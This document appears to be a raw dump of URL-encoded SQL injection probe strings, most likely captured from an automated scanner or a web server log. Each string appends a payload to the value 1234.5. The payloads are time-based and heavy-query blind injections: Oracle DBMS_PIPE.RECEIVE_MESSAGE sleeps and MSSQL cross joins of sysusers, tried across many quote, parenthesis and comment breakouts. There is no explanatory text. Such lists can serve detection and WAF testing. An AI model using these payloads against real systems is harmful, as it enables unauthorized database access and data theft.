1234.5%29%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%29%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%29%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%25%27%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%25%27%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%25%27%29%29%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%25%27%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%00%27%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%00%27%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%29%20WHERE%201224%3D1224%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%29%20WHERE%202736%3D2736%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%29%20WHERE%202806%3D2806%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%20WHERE%209308%3D9308%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%22%20WHERE%209262%3D9262%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%20WHERE%203264%3D3264%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%7C%7C%28SELECT%20%27YdXD%27%20FROM%20DUAL%20WHERE%203883%3D3883%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%7C%7C%28SELECT%20%27sMdK%27%20WHERE%207318%3D7318%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%2B%28SELECT%20vkSj%20WHERE%201109%3D1109%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%2B%28SELECT%20%27HRgM%27%20WHERE%205118%3D5118%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209315%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20AS%20sys2%2Csysusers%20AS%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- 1234.5%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29 1234.5%27%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29 1234.5%27%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29 1234.5%22%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29 1234.5%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%283973%3D3973 1234.5%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%287507%3D7507 1234.5%29%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%286754%3D6754 1234.5%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29 1234.5%27%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%27WPSl%27%3D%27WPSl 1234.5%27%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%27jJBL%27%3D%27jJBL 1234.5%27%29%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%28%27Rwfy%27%3D%27Rwfy 1234.5%27%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%27iWcZ%27%3D%27iWcZ 1234.5%27%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%27giTe%27%20LIKE%20%27giTe 1234.5%27%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%27OfZZ%27%20LIKE%20%27OfZZ 1234.5%27%29%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%28%27hCIA%27%20LIKE%20%27hCIA 1234.5%27%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%27Mtob%27%20LIKE%20%27Mtob 1234.5%22%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%22AvxI%22%3D%22AvxI 1234.5%22%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%22WPnU%22%3D%22WPnU 1234.5%22%29%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%28%22JDLV%22%3D%22JDLV 1234.5%22%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%22Ukts%22%3D%22Ukts 1234.5%22%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%22OOsD%22%20LIKE%20%22OOsD 1234.5%22%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%22qewI%22%20LIKE%20%22qewI 1234.5%22%29%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%28%22EpTZ%22%20LIKE%20%22EpTZ 1234.5%22%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%22rRVm%22%20LIKE%20%22rRVm 1234.5%25%27%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%28%27YwkN%27%3D%27YwkN 1234.5%00%27%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20AND%20%27GASH%27%3D%27GASH 1234.5%27%29%20WHERE%202991%3D2991%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20--%20 1234.5%22%29%20WHERE%202115%3D2115%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20--%20 1234.5%29%20WHERE%209698%3D9698%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20--%20 1234.5%27%20WHERE%208591%3D8591%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20--%20 1234.5%22%20WHERE%206083%3D6083%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20--%20 1234.5%20WHERE%203724%3D3724%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27sNHs%27%20FROM%20DUAL%20WHERE%209997%3D9997%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27KnGI%27%20WHERE%203525%3D3525%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20IYpA%20WHERE%204925%3D4925%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27izQn%27%20WHERE%206985%3D6985%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206552%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28112%29%7C%7CCHR%28117%29%2C5%29%20%23 1234.5%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%29%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%29%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%29%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%29%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%29%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%25%27%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%25%27%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%25%27%29%29%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%25%27%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%00%27%29%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%00%27%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%29%20WHERE%205137%3D5137%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%29%20WHERE%208895%3D8895%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%29%20WHERE%203849%3D3849%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%20WHERE%203449%3D3449%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%22%20WHERE%205620%3D5620%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%20WHERE%201537%3D1537%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%7C%7C%28SELECT%20%27poYC%27%20FROM%20DUAL%20WHERE%202518%3D2518%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 1234.5%27%7C%7C%28SELECT%20%27gawS%27%20WHERE%205937%3D5937%20AND%206395%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2889%29%7C%7CCHR%28104%29%7C%7CCHR%2871%29%7C%7CCHR%2868%29%2C5%29-- 